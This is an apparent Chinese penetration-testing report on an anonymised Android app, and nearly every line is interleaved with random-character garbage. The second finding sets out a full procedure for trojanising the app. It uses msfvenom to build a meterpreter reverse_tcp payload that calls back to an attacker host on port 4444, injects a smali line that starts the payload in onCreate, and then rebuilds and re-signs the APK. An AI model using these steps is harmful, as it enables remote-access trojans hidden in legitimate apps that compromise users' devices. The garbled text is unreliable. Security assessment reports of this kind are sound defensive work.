( y+ h* [' X' P) v9 ^, x! H: V3 ]3 [9 h1 V
+ ~- H: U9 d( E! L + x4 g' _: o* N1 l

+ A8 O& `, G0 _* X 3 ^6 L( G; a q9 N# A, y 文档编号： . n: {( c* w* x/ ]# L# s( O$ ?9 O/ y- T6 P: f( p7 w/ N. I0 K1 ]

+ W8 z' ?7 b) b4 o. ], r ; L+ ]3 M5 W8 O( x& c. V: l " g/ v: V0 {" g 1 P5 C! ~: Q& ]: ]

) ~0 S; E) d8 \3 p3 q * r5 b$ c$ i8 a ' e0 j. U; I, {9 U3 A( }6 A$ s1 ^3 W8 D1 C; S0 x

: n0 \& B3 m4 B) p, l$ O: G# z, s& k9 K- t. N# o5 ` 2 j; [" y( B$ @2 ? 9 V h: T3 n' y0 F( N0 ?# Z& l

! `5 [. ^8 e- s$ Y9 A3 `1 w' U0 T# s5 L # c2 S. `' G2 U8 V8 R) R _9 z- ` l* M+ U) k" z" h5 O

0 p, f4 e6 j1 `# W I + ]3 i& J, \/ q( R* J% F4 R6 r2 l . G' C9 @' U6 h* E) K4 [ 1 o9 X3 t/ {; z8 R' Y

7 P6 L! B# F9 G) ^. O ( B4 X1 d# m, y! H& T/ i( g: D 某某某APP渗透测试 $ H. ?4 l0 R. i3 S& I: Y ) m, t9 v9 X1 G: D" f, o- g

7 w+ j- ~' t$ D3 a ( J* \" e8 @- Y! r* h' X _% w6 l$ W0 ?. M 2 ]! o% K8 s& Y7 d

5 k7 m( c F | 0 j6 k7 l! y$ ?" z/ g/ P( t ) U% k! l0 G& r/ p 6 Y+ e$ V: I& Z( {

5 u S/ k6 L% H Z. C: w, P $ Y3 C; ^. J9 i* ~' J * W" v* Z+ A1 ]- P, T : c" l5 t" z2 B2 L% c# ^( F

6 R# }7 z, {, e( I! ]/ O9 X5 p' a, w' {- W4 e- G0 k+ v: H 3 _( K) G. P9 S/ { 4 J$ I5 M9 s' K( U8 V7 t" D

# E, D6 c0 @7 P5 Q5 t S/ E$ O( z" i$ P% n/ o: E1 J. ^ 技术报告 7 @" u3 M4 Z8 I+ e* V4 K( N+ M : O8 s8 v# Q. }: ~$ t! y6 t7 L( {" V

2 d3 T) U& A/ D8 C0 i8 O6 x6 |3 N/ O a + u+ Y. B4 E: ?. M: R; @/ \! h4 T3 L

' s/ J9 R' x' x+ \8 N0 a8 O : ~" I( C' ?8 B v2 m $ k9 ~6 A* J$ F1 a1 r 1 O! V2 Z' x8 q

* D8 L" e4 o8 O; k+ } $ }9 ^3 y: ~& M " C7 |" B. d* L! X# v x6 D$ \; q1 Y* e

1 u$ a. g8 x3 D 9 C# S; V! N( H3 g9 s. T3 i 9 y+ x# p$ L+ P9 d# W. W1 P/ ~) p* ]/ K5 {

3 U3 F) h, L/ L0 Q$ Z! c1 I @$ p" c, Z! }0 O0 M( Q 3 ?) P/ c( [/ \: ~ ] - h+ u7 i, m5 m

; m0 J( \! R% V' m0 m ]6 I8 Q$ H- O ; B5 U# n1 D4 R : x4 @( j# y; V9 ~- y U; n6 \& V$ F# B2 M. z6 U3 H

) W6 l' S3 B1 g% i- o' O* a; f/ _2 @ ' e7 V0 ]& K H0 E" ^ ! Y4 j8 p( w% H% O$ j

3 o. W: ]7 E: E* f8 n: R0 s$ x3 Q" p h0 H3 p0 h0 \7 B & n* }5 C& z! N ! b% u |, e3 h% ? t- s& r7 b

+ h, U0 v1 u# r% [% {, W$ _ : [& l8 c: h) j% E # M3 ~; Q2 M9 r b5 m! l( ~: J" U& s7 d

9 b8 F' @4 W& _7 \; q ' F9 G8 }6 }; z( ~$ g$ P( x6 h) F ?4 A0 _: E; r! ~9 h4 Q6 [+ X0 M* } h5 f% t

' }- b+ l' d( z! H 1 m0 a' \- B7 K4 B( k/ { ! q' j! Y9 u0 D Z& \# ?4 A& X ! D2 d/ k+ x' N. u1 t/ o

/ r" S/ B3 g/ a2 `( a" i- ~ 1 U- J! k% ]. @+ G2 l 3 x; D1 G- i2 u' `" x/ u* d d- q' _- u& b. Z# I- \$ C0 O9 Y

& |) I; v8 a& _% j% e2 k1 b 6 x# i4 [: J9 \. d5 U% g- B 1 {4 k! j( h6 s) s4 _' y' `' h3 F- \6 y1 z; p) K Z" ~, H

s& Z: K+ U* ~: K& V + _0 t7 u6 C0 e. @ # b; ^3 W9 k5 ~% B4 D2 F; Y$ x b( e3 l* y. r: F

$ J; @- A: W S4 {3 r2 } N1 {2 G! C! k Y) {! | % t" r. ^8 K( q3 N( I 7 u. @5 y3 ?/ F8 | o

) R# J/ w9 V% x. g7 Z" d( o' r2 e7 @; Q! h0 R1 C1 T2 [. a3 A! }- A3 B & F" g- x9 D/ v7 | ) ?) t8 T- _+ f$ P

0 M8 l! ~ |7 S0 b1 h 7 f. c1 }: w, K: c* c+ z: [ : M z: Z% k- y$ _$ W * j+ U. b( R2 G6 C: q

# w/ F Y$ q: a2 w* E - f% V7 D8 ] ^. W- v 9 e. V, s/ E) o( \) K r$ H- n% b6 v2 O/ a; G

3 a, u+ T8 R6 S/ S. A; o 2 H# N9 g- ^% F3 V: J' x1 X- C3 N7 H 二〇二〇年 6 a3 X6 z; X2 L+ f8 R' p + |5 e( c' o+ u

' }5 f3 ~" v0 N5 d' _% a; c ' P; r. ? I) c7 a/ ?8 h% T" R# E 目录 + ^8 W# N- y0 A+ A" [ q8 ` , W' c" W6 j# S S" T0 d+ I9 f

, v/ T5 C/ u: d( N6 I. Z1 C2 b+ |, X# D7 L+ T( r- H" T # m C) ]/ e2 ?* V 7 o" O2 b5 Q: P! Z% Z8 ~- W

$ @' L% j; n8 c/ Z( e% X! g" m) _3 [1 z 1 概述... 3 % l- f' b9 O0 V, \: } . o: }& f$ w- S8 t8 A& t5 e

6 R0 [, y* Y! m1 k2 B- b G1 B5 C P8 i4 k0 U 1.2测试时间... 3 $ `1 c& ?9 Z; i! `* t9 T0 O! G; | j8 M3 A' I6 ~; m6 h) v

1 T' A6 e2 ?' T6 U% `2 ?- f ; N/ A! E5 b ], i, a 1.3测试对象... 3 ' r8 ]8 R7 h3 z5 k. y 8 N# u5 V- @) \% |

1 `/ Y! s, O, a5 f; C $ d; O: O" I( ?4 r 1.4测试结果... 3 0 D* p4 W2 N2 R# O$ M& E. D, P 2 q [# P* m0 f

. Z+ E( V6 V! v) K: |7 V ) s* Y, C3 t/ q2 O) `* k3 q; ~* O 2 检测结果... 4 ( L- ~, m- o2 x" Q- ~ , E2 G- ^& I3 h; u

/ m- O+ e5 F5 s5 t( @5 \ : i4 `8 B m: M. H% K' u9 X2 U 2.1 某某某... 4 ' m0 d4 U# G n5 `) y5 }$ U/ ` . P2 |, N( ]4 E

8 Q7 |& m/ l+ v0 G7 ]! g " y0 [/ l) |: R! }0 o 2.1.1检测目标... 4 % S' J" H5 `& V+ ` # n+ t9 H% q# q: X( S

[2 A% F- T) f( q' w2 q- n1 }5 i' D5 ` 2.1.2检测结果... 4 / P& g$ E: u- N' u , K+ [) m% J4 t" X2 A( {5 n& F

& X' T& b+ X: l; A7 D : H# e/ B8 u3 t) h. b% f0 g 2.1.2.1. 4 " s1 c/ {- q3 i* P( l" _ D8 e! P1 G; }* ], }7 Z

- q$ _6 x9 a4 @5 b 8 c: f# _. W& y$ ~ 2.1.2.2. 6 + b* o1 g( k* X) d1 R$ j6 K/ O% ]% Y* N h* z- e# M

; i" P$ q3 d6 Y7 s; [6 S ' M' |+ T( |. \' d5 d8 E 1 Z3 [; S. K) c2 F ~7 X$ ~ ^ % @; H: I( i% `& ^4 O

! P$ y5 S/ G* w/ J. O/ x5 `' `# o! c, J 1 概述 + S3 f/ W/ Y0 o 4 F/ d# E2 L4 A/ Q8 [; J& L3 t/ W

/ }' u) u K8 O2 q" C; T+ g0 }6 G( z4 \$ E" } 1.2测试时间 9 i% B" O% S& Q # f" p9 {1 ^$ a, u3 O2 }

1 \8 g+ v! C: r+ y, `9 H- ~4 [/ K5 b 5 a5 U( \$ W# M$ f6 ]! ]% y* O" G5 l / B4 ~; B/ }; q: M+ s + U0 f9 G7 s+ ~ 渗透测试时间 0 U+ j# u) C" ~0 e 9 _/ M2 m0 [% B( }- w, B7 U- y! Q , X( J8 m3 a, N5 {; x6 a. J . L8 t6 Y( E. A6 y% u
$ \4 z4 ]& U, @; x; ] 4 j$ \|/ }" a& D9 G: u & P& f- ^, c+ s. } ) k9 V" C6 l' R, D4 R; W8 T. a 起始时间 0 n9 ~* w( Z( e1 K( X) I( j . g6 X- o& z4 F, L ( w+ X( M0 V3 \|9 I4 h% g9 Y ! b9 A8 w" M) j, u0 s. [1 d) k! l	# {8 \2 C2 n+ z r ) g7 T! i9 C! l7 @+ f! g8 q# x 3 m- M& A! w1 A; i* C+ i - r: U' y+ w2 G 2020年4月6日 ; q9 {$ `8 {9 r" k ) o7 p% s$ \|" I( \& C; V* W 0 d2 W, t# y+ }& G& w0 }8 V \5 ~+ F) j7 C8 R8 f6 }- z$ d
$ O# C+ W( M9 \ : @2 O2 {/ f0 F6 I$ w# \| 9 Z/ y3 a% [) P3 `+ ^- [- u# {4 b6 p3 ^. j5 y 结束时间 - Y9 s; H" k: u6 S$ B% {" u1 F# q# I3 \| j. u! B3 x 1 `& S3 l5 x$ r# ^# l P* [$ a8 Y- E / s1 \7 M! D# \! C	5 q" g- J0 }. V6 a" P; g6 z6 s" E# J* S $ e1 D8 \/ A# v3 B% \|0 S, k: Q8 C$ `* K: u) K 2020年4月9日 5 A$ \|/ W# U8 ]$ f2 u2 G% }8 e2 y! \|2 K" s( k9 a " D& Q( {( T# e 9 p0 K! \- `( Q

z9 B" B4 F+ N. w3 n" ?2 e& Y I) U* h7 J$ c0 o* e0 P% _, E" ^ 1.3测试对象 " b/ @9 t! f! @0 T( a+ \7 A( d ]) E1 Z# D6 ]+ f) d

. T6 b/ }; g% U. O5 S# }8 k! ] , R; h( e6 {$ Z8 `8 e* h! U 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： & P. k1 \8 ~- l 1 ]4 c- d- A' m7 j

( k9 ~8 k: W3 ^! o. B! T: G" b # `) @# V1 i; g, c+ b2 u6 x 表1-1 检测对象 # b8 E. h2 A6 f# { J& W $ o. O. \# V8 ` ?9 \! c. B. r! O

4 q, {% B' Y# ^' D Q K; p2 R3 q8 g) y : X! }6 E* \1 E' X ) p( ]% I' e4 l+ e& R6 m, A3 B/ P 序号 ' ^; z' P+ J8 q1 z+ j; f' C# `$ ]1 }+ n 9 D9 N! }3 h$ b0 _, G4 s: C % ^- \5 ]2 ?- n2 O	3 V3 H# }( A, j/ K* I 8 A# L2 q6 u; E* P 4 f, ]; S* H' ~* x1 f# r$ w $ e, `3 B: r# z& \# V 测试对象 $ ~8 ^( l4 k7 H* G* x6 n/ g 2 s5 E* @. A7 s7 ^2 T5 A O) w; T8 e) R3 K% t6 R L, ~ 5 T! j7 q8 m; T2 @, X5 z	4 u3 ~0 O5 R* t+ L * k$ d; S* t9 g ; q+ I' g, H3 T$ o9 g% Y 4 A# {3 e7 [# m$ C! k 测试地址 5 B" N; K4 J' Q* H; t( ` 0 \. j. ^- w. M0 Q" a, J ; z2 k& I5 A9 _6 N$ ^! P0 [ 1 c0 a" S5 q) L8 F! v5 x	% z1 y9 c9 u' o2 }$ n' I! ] 1 t1 c0 U. u$ t8 T% g) Y1 F/ \| ) d% [1 ]( }; m" d9 v$ `- Y ! h8 }; k4 u3 Y; o% b' \ 安全漏洞 0 E" y+ D6 g- R- W( \8 a 8 T- j) [8 V6 S 5 \|2 E6 n' k0 g4 s; e- n 4 v. \|! l' ? `
8 ]5 X8 {( x: T6 \ 0 j2 _, ~# O! V5 K 3 ?- Y7 I9 q# n5 a' E 0 x+ v) ?" i& E# i$ n% @ 1 8 i. y& O4 T h' {6 i n 6 {. e1 m! N9 g d/ h1 r8 J3 H% E# s % `) j4 q3 D( ~& P9 \|! Y	5 A2 L/ n6 I# g1 T5 l- R/ h( u; W. _) L7 Q0 Y$ W O# i ~: @( o, V6 C0 C/ h! ~1 a' w $ t: _( ]1 I4 q5 m8 a4 `! V 某某某安卓APP % N( F% T V6 v- t; Z5 c0 \|3 a7 [0 \|9 i0 Y" Q9 o # \# p7 H$ W8 `" C9 o + l) a$ z' f8 j% o1 ~! o c, t	. \; Q. d* {( J) w- \| 0 ]4 ^# z p* u, \- O$ y ( f0 [. M, A/ T ; g7 b, @$ s, \4 [. ? ' E( S8 \|0 X! C7 H $ x1 [& n+ c) m+ H- i 2 i! v* j8 x' c' t, @; t7 y6 O8 _0 V9 y- k5 L& l3 X8 N1 D! I1 B. I	4 r9 r: c. s' T1 K/ W, ?( t! y- n! o 2 M3 W3 H9 _% o" e% ~$ h% I / K; Q4 q4 \2 @( Q2 Z 2 q" \|5 v) x9 H# G2 { 2 2 P9 b1 H/ f' R8 t0 U 6 U8 c# I3 C P( i4 w * M' U1 F5 s: B3 l8 U : b$ Y- x4 A1 R; w7 i8 f' F& O$ `

& O- r8 u% O% n # Y1 R/ K9 t% d( r- S8 ?% a! \ 1.4测试结果 9 W& ?$ I8 J3 u$ |) J" I# y: U% H! i

! A E* R8 g8 p! Y+ F+ i . u$ Q- v3 r, q+ T& z- E+ Q 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： ( d; u( h1 ? u3 x) S9 Q4 Q5 S5 H; W$ F+ L0 S

+ c8 K+ ~5 o0 z# p( B) p2 S4 {% m# d1 e" m& C ! |2 x- h, W. [: c % d/ y4 y9 d) \3 e

9 l. I' t9 V9 j# e* q6 l - u* t# M! e4 v7 C( J; s- N' j 序号 * G9 c1 B! P2 E) H% B w8 I& ] 1 R5 [ k9 N4 o; a- n' m* P

( \2 ]! w! J" h J2 L+ I. B$ n9 k8 W2 b# G7 V! k 系统名称 0 d* s5 I* x3 c# a6 B# z 2 ?+ c: X/ o7 k* L8 N0 |/ K

/ M# w) g* ~+ B1 g9 l: r2 v/ c$ f% } 漏洞名称 * R: k8 m9 q% b1 d# c' x7 r1 [0 n+ C

4 k) C; U% d! l2 f " h R7 h. ~, m. w$ J) ~9 e+ P1 P 漏洞危害 * f, q( S+ e+ ]( D( w+ h3 k# U7 n 8 }: L6 a2 T8 s: Q6 ?: j" }

' v+ Z% w( D) C - L; W& R' s7 t! ~- d4 G 修复结果 q' C* {' h1 O& ]' t! [+ {- M % p6 z6 p5 O7 c4 S+ s

9 H/ s# V: r+ ]! j * p f: C/ j2 ^2 O0 P0 ] 1 7 i6 h+ r* N, _; `6 _, u" F+ |# I/ M * I' L8 A. X+ ~' x! d

) G) v$ W5 l! O: H# P. C( z+ z' ^9 u 3 ?- C/ j/ e% U4 j( s9 ~ 某某某某某某APP 8 o$ R) M8 W) M $ B2 F z4 R W+ r( S% b- I p

8 c# e0 z3 u3 u! I1 R( v3 J' s) g$ \$ l4 s; Z1 q9 X% @+ |( ~: c Activity 劫持 ; p5 G8 Q8 h1 ]# A6 w. z * G2 p$ g9 Y/ h. d4 v

$ ^- c) V: \% j 2 p! b, H0 ^) I# y8 a. { 8 q9 V( t( V; w) `! D8 G $ P, E' n# n' w# g

" E; B! H' K6 F3 `. g; ]5 R 4 n: p: b$ F: y% E5 _' }) T 高 % f7 B& y/ p" o4 X% A. ?% l + [2 }1 _( l' \; D+ Q) d+ J; |

( f! E) O2 N9 t- i' s9 F# F5 _& U2 x c7 C$ { 8 }2 y( z0 y4 R9 @2 q ! B- R; s# k; l2 h1 @

+ x1 g1 N+ A. Z* n' ~4 D0 U+ x1 B, d2 t4 P8 E7 o" l. `* A 2 % |+ A$ k4 J) K! Y. m e6 D- G9 @

# @5 x l' Q' a2 \3 n) z; I o2 p , L; S+ p! H# y 某某某某某某APP 6 E1 Q8 b. ^0 I' r1 H* D3 v & b7 F# `4 T& _ |1 ?1 ^7 }! x

) G; \% J/ G2 P) ~. o 1 f' f8 ~8 r/ {& a% ], {5 k% [ 反编译二次打包捆绑木马、篡改APP代码 9 E% |" m" K2 L; K6 D. j' h: S. J& d9 Q! T1 }

9 p/ U6 O+ o# |' x& H. S1 J' Y4 q1 f# B# S+ Z 高 % C, ^/ ?& ]! k( v" y- f3 [! W 8 Q k \# {" }5 o4 \2 n, p

, M" _) q2 R( ^0 q. J" p. x, ]2 Y( x & M- Z# @$ ?5 I( J/ l. ^ , L; i/ n. b8 X9 e/ g8 B9 v* O2 H2 ^5 K4 P# n6 r: u# v

6 Z' k- n n+ T3 T! j . ]6 {/ ?# H) N7 Z2 w) Y ! S" @6 M8 k* E7 d! O7 Y 2 _6 l# } w' ~/ |6 {

( B4 R% g+ X6 d+ u6 k, o % ^9 A! [- |: @, T 表1-2 测试结果 / J* G( T. V1 L! v7 ~ : H( B: @/ c0 Z. p3 f, y$ l

6 M5 G$ t& f Q3 ?# x. r' r( | 4 C' w+ b0 Q2 u/ o ! M/ D$ N: x6 l / [8 u, B3 i. ?$ F9 ~

l. x. d# o1 P . g2 W5 u- V$ B 2 检测结果 # n: p* J7 j% O% } % L$ v% e! ?. u3 d) }9 H9 \

+ G8 v7 {4 H# s1 Q" `2 e9 O4 @+ x " y' H G5 G8 c 2.1 某某某 0 K0 @0 S" `2 \3 b4 r 5 s: U+ p6 X# Q' y; c$ k

: m) i9 R- F2 Q0 K; V7 i; n; J& x) v: T( `; @( q% u 2.1.1检测目标 7 z8 l- Z% m! Q' [4 v& w3 i ( R( z# @2 V( q; p9 ?

: _9 X7 Q5 }7 }% z6 h 6 [# C7 }7 E! d: D* O) U* o9 t 目标地址： 某某某某某某APP 2 L; i8 j; _/ k3 J1 t2 f$ t! \# M" o2 C3 {$ ]( `

" X1 ^5 B, j: L0 W) H9 X J! D% g1 _+ j% x+ h- Q0 T/ r+ p 2.1.2检测结果 0 \- b) z- Z, C2 G" \/ F 8 @0 e: G+ y' e! t, G. _6 r+ m2 f

/ ?* B# ?- D# m3 v! B . Q3 \# D2 d, v 2.1.2.1 8 P! r! X* y2 c; U! M9 S6 n, o; }! w. {. e

2 o3 s4 t3 D1 i" ~ " ^- H6 x. T! \* s4 J' e 漏洞链接地址：某某某某某某APP s* I& ?3 i. t, A& H 5 F# h' r2 l9 O6 s0 a

4 i4 `4 d0 Q# }- L0 [: `6 P- e6 ]+ r, y# Q6 I! D3 I . L+ }+ V! R( q% }' L 1 k" i. T; g# o9 Z7 M

2 ~ e: }9 p/ a3 a" f& [' r ' C& u7 c2 \: f3 K, S7 m 漏洞分析及取证： 3 |' k9 V1 ]% B% ]5 k 5 g6 [+ D9 U' d9 Z

3 h5 f$ d5 S0 a+ ?! I- K ) f8 @7 o8 \$ T, j3 v/ Z. u 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： ' Q6 \: r2 @/ _( J + e3 \/ t7 s# d/ H& R# y8 ?

/ z* Q8 K3 t* h$ r, B( U' _ : }$ B: J9 g6 B7 L; A# ] % L$ O2 F g3 ~( V 8 `" l- x0 |$ i3 x2 {# H8 i

" P+ ?+ v# |+ {* R+ h - q; Z6 H4 v: u! u 7 H1 O1 W6 P" ^2 F( X9 U 3 f: z! ~$ r4 s

" B$ o! e6 ? u# T, k/ D- W+ D$ N$ _( X 8 S. {: \5 t& _, |$ z1 t" p" i 3 r! h& a% x+ m. [9 F# f/ T7 ^

, _+ b8 z( P' {" o" Z }( k0 H 1 y' v6 m6 \! }: U5 p ; q ?+ T7 O: R4 l1 U2 w* x4 j# m: |3 M8 {9 O, U# O! @% G6 h

. \" d: m0 e8 U& r4 Q$ o. D3 Q6 A 1 O `2 K2 v" E" h: b# [7 t/ p6 Y # N5 S4 }" l8 v 2 u& o& D# h3 l* @0 @

# |' q3 F2 j2 \* J* q6 A5 `& r8 `5 V : ]! X! K& j& i8 ]/ O; X 漏洞危害：高 : X& m% t9 j3 N1 T- j7 E9 {/ p9 y% Z7 W* A6 X k

6 v% \|* i- d) A- @9 _+ O$ T. v J) @ 9 p! F& `2 _7 q1 P1 n 7 O( ^9 ]% V0 f/ ~4 O( l) f . Y. U& z& l. D5 a5 d' M" [1 d4 V 严重程度 1 A" \, u5 G5 C: R ) {) U1 s' i* [6 f: M # ? W( N. ~3 j& u8 y# `- F2 A7 \| 3 j8 H! X3 j4 e: Z	. s$ P! E h- \, N- t 2 Y6 W( n$ }! x $ W" K. F* v5 Q2 G& k0 \|1 v " C" q& G" Y- e) f 高 3 _! x+ H+ K+ }* ` ; I: p4 f% t, K- B: a" t # ?0 P" G M4 m; K( H4 ^4 C! \|9 M 4 c7 P9 J. l0 @+ ~0 P	2 a% v8 g( {3 ]5 G" d/ A4 W; J9 Z6 d! E" U" d, w/ V - }; z L" h7 \1 G * I( Z1 W. }9 i% ^; I7 ~- w9 B! k: Z! v ■ w1 L; v3 }- Q! Q, B 9 B% u" i! H, ?! ?9 Q " I6 f' ]2 F$ \+ f/ L) `1 o" n+ R 1 _4 @, W9 B6 n! \- h- `- V6 e( _# J% b	! \% E N5 ?$ t' s% Y 8 g, K6 q7 K1 B) z ) ]+ L: F' _6 ?% E 4 ^% y8 F! \9 ~/ u) N5 Z 中 6 [, F# x. l7 q6 }; \|" h7 _: S+ K5 { ' m/ x" B7 R9 e a( g* U4 \ 8 ?& C0 ]5 z8 e/ s5 T4 v4 b/ G1 h: v& [$ n1 n) k	$ g. V( c8 \# S" ~, {6 V' J# x 8 x2 l+ f2 q1 z9 m- D + E. m6 Z0 e9 g5 h( B* G/ k1 V* f1 g9 J2 o - B% Y/ V0 c% m2 q9 Y+ n- \ L: B$ o4 i: T T : q2 t! m' T8 L2 b+ L) E; n3 m: A6 \9 J( @& r- j" d	* X% o# t+ @$ S0 _" b4 { / r0 c0 T0 ~9 u% p6 k6 B. a 8 D! ]% }& I1 ?" @- @/ H. L1 B! p/ S 低 9 X' X5 `3 R& B7 [( {6 n6 d9 }% q; s5 T0 `) K. X / ]9 E7 Q! s. m* i- t9 z& n7 w5 T5 x 0 L w: H( Y4 _4 B4 ^- ^8 q	) _% F5 \( ^' K4 b 7 ]4 Q2 T) s6 y1 H 1 A- F9 _' G/ ^* Q( c' R2 L9 x 5 w+ e" u- e: O' L; [ h6 y ' S% s; Y. G% c8 `% [# x$ \|! Z* w/ @& T* q7 c1 {; n9 U 5 [' M- ?" k8 @. s: h ) Y3 u7 \|- h @" `9 `1 F

6 O: [' a4 k; q# X' R- t 7 H2 ~6 G0 S' x) _! O/ e5 M( t 8 ]' R. w% a7 j$ Y8 S& @% a' N5 j, y* W. ^" R& T

$ J4 j" W# o* a8 ?5 c9 l) B2 b1 H4 w ) V t5 o; C) x7 W! @' B 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 - A+ w, @: r; _+ S- l4 z# Q2 M / K4 A, Z9 }- b+ o+ M

- Q2 s; J& r: `& j2 Z3 X( x 7 I+ J4 ?- ]: x/ _4 e5 l ) x- ]1 I- U/ P) ~' o : K0 V# ?/ \9 V4 g& a

# f" I& F/ _$ F! p " c. X$ l3 Q- L2 n* M9 X% F0 V* Z ) `$ r/ _, N0 n6 b( ?, X & z1 v2 S! m- `- ~( U) p

0 G' Z3 M9 [. y& p6 d% K; h- V( W' E 2.1.2.2 6 f1 R# e# J& |8 h) P' p 4 T7 `9 D }- ^& F0 `$ Y( z a3 K

1 w* ]9 f$ c0 F ! A( Y6 z8 H# x) u7 x' T 漏洞链接地址：某某某某某某APP + E6 y; A+ K; L1 x! p9 y 9 Y7 \( W8 J6 u3 r* F/ J' k

- v7 o; V1 y3 k: w' l( c3 M* t( N, p1 m+ E7 M- z 漏洞分析及取证： _, ]8 i) E& r % B# s& ]8 c4 u8 ?

$ ?% @, U1 B! g# D " R' G7 t8 a1 L7 K 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： 5 u7 M7 X' c+ U) t 2 A. t |. b4 T) M3 Q9 h

8 ]8 `7 ?8 @" T6 o; |6 w / |" T: {+ u* S5 R" e 用Metasploit 生成木马 apk * S/ w& ]) ] e- } 0 j4 e( f) x( a( L$ v# E8 y7 U

% b L& g+ W7 [6 E, G* K1 | ) C, d9 }$ v9 A8 |4 M msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk " p- Q5 R* R! v h$ D/ u 9 X F! e6 s8 K; B

! J- B5 |! k6 @& n0 w8 n 9 x) G- y) |$ s* z 反编译目标apk和木马apk ! R0 Y* _* w `' B( y 9 f7 ]+ D" V& b- y& p8 c, u

8 f0 U4 ^2 b; g1 n& D t1 j& ]- u% B3 K h apktool d target.apk
5 a5 ^" t% R2 P- V$ h$ h , K' q3 w7 V3 ] apktool d cockhorse.apk ) w0 I/ m) p- w( k2 K b- O% q |) k/ D1 k2 m+ \+ a

6 X4 M, ` h u3 r! K X$ Y- i1 z0 z( A 木马 apk 注入目标 apk 6 n* x5 P1 A3 U/ x % ^4 @+ d( P# E; K

) y; A5 j1 n" G0 b5 u. P+ n3 K6 |' e' h( Q) { 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
% M' C" a; Y# }- M k" D& P0 o + y0 D: M. c, s' M invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 2 V1 _8 R" M. r, s5 @( x: X ( ^# W) Y2 \% ]

/ D* Z$ d2 x, c N+ o1 ]6 ]8 }- H5 @/ t- B 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 5 \0 B4 h/ u+ x4 U6 _ 9 |" k8 Q6 F/ l! x/ A. s" n& R

+ s; |/ R: c5 N2 k9 [ ) l6 b, \# W5 a+ K 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 2 f; z1 T6 F6 X, V; p5 w9 g# J1 M# C5 p$ M8 n

8 Y1 H. f) Y4 j" R, j6 ]+ I! P " t8 d, j7 W0 \" W" f 回编译生成最终 apk " R: n; j1 u; z$ U' }" ~1 c6 I ! n, W, [% G- Q# |7 y2 u/ b

( L; P1 Y% e& t% [ , t; h5 I! q: u. I 重新打包 ( x* w& P" g) |8 O* g! I$ Z* F ' G7 p2 X+ T! d/ N( R1 D" ^( A

0 h3 ]! }0 s. x0 G" a# d2 m& V 0 [; \" G" e5 H4 { apktool b -o repackage.apk target_app_floder ! _2 p0 `! `& x9 `- P9 Z 7 i+ e. [% t. ]1 v

0 m- ?5 q8 j: i4 C : s7 T" M2 O2 f1 Z! u 创建签名文件，有的话可忽略此步骤 ( |& ~! V% a+ j0 P) J& r- \ 6 _$ ~* s b* H/ @2 {! y

; b0 o: Y: v; P: B+ O8 P! f0 E$ i - q! k q9 M6 `. V. Y4 M keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 8 p$ U, W0 X( C1 x L % V" d" S1 p( G- B9 {0 [! V; ~- p8 h

" `$ v. R9 V% ^ 6 ]$ H+ Y7 a. Z0 |" j: q5 N 签名，以下任选其一 ( A& |" M6 j. b. L : ]2 m+ r7 E; z% ?2 ]% v

' R7 ^8 X% K2 y , ]! l4 n! v0 ~9 z3 c& Y jarsigner 方式 ! O: P2 S1 p y( r3 {4 v' d6 a, ? / O7 M$ ~9 z- I

. R& U# V3 @! G1 `. [' g3 |/ W9 I% `2 V jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname : X& z0 z' Z/ Q& Z! Y 0 K% ~( W4 I* b$ k' i6 g

+ J7 m+ B6 l6 Q# v ; Y! O" \) w6 Z! y# j. B, | apksigner 方式 8 S/ M' v7 c0 U/ ~ ] - Z# D7 `1 Q0 P& v q! ]$ e

# E1 \( n/ v$ X. c4 A1 Q: y0 W: E) Z; T 0 c' s7 O/ u4 e' L# S( A apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk , ]9 a: d F, G7 O# C4 \. t* g9 p 0 E# H7 |: l* L5 a6 O

6 q* J8 F6 x0 W7 }& ?. \3 { ; u; D6 E4 {* k( z 如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 k! t: F3 o; h4 o! d # c4 L9 G- [0 p. e- o" e+ w

8 M8 N* y, j, j5 {: I$ J% c % h9 x! c N" R. V* p" V 验证，以下任选其一 6 o, I: B4 k! d1 S1 Y n+ i + l9 V) w' l. d0 V+ V

- {, R" k# M: L& p. }; v - b6 W# ^! B0 r jarsigner方式 / @4 O+ g: S8 h0 U& s3 w z 7 ~3 q* B- }) A/ s! V4 C! ]! ]

( C) P# X- A- e# C# q ; c* b# i& P9 t8 N) C I2 m jarsigner -verify repackaged.apk # m0 y% O4 b9 Y. v; g ; p3 L5 n" ?( a) G1 h$ A

" w n4 F: N A o; X4 _! ?. h 3 r( x$ O$ {; [1 S apksigner 方式 5 S7 A- X& L1 z4 Z. S+ K5 }3 P! h7 b6 G+ ]% ^" T3 V e2 [; {

' {1 _- h6 s' H9 T9 ?' F1 L8 Q3 i D7 z7 Y8 P# B apksigner verify -v --print-certs repackaged.apk & ?: d X' B: V4 U0 O+ j3 n% C, V% L( `2 Q' _/ q

; S3 E& R! s* G$ S5 ?; j1 j' m8 v3 c. j2 m& u4 a keytool方式 ( O, u6 x9 z+ R" W/ W+ ~/ l ; v- ^# S% w8 o" V4 z5 j0 S* o6 E

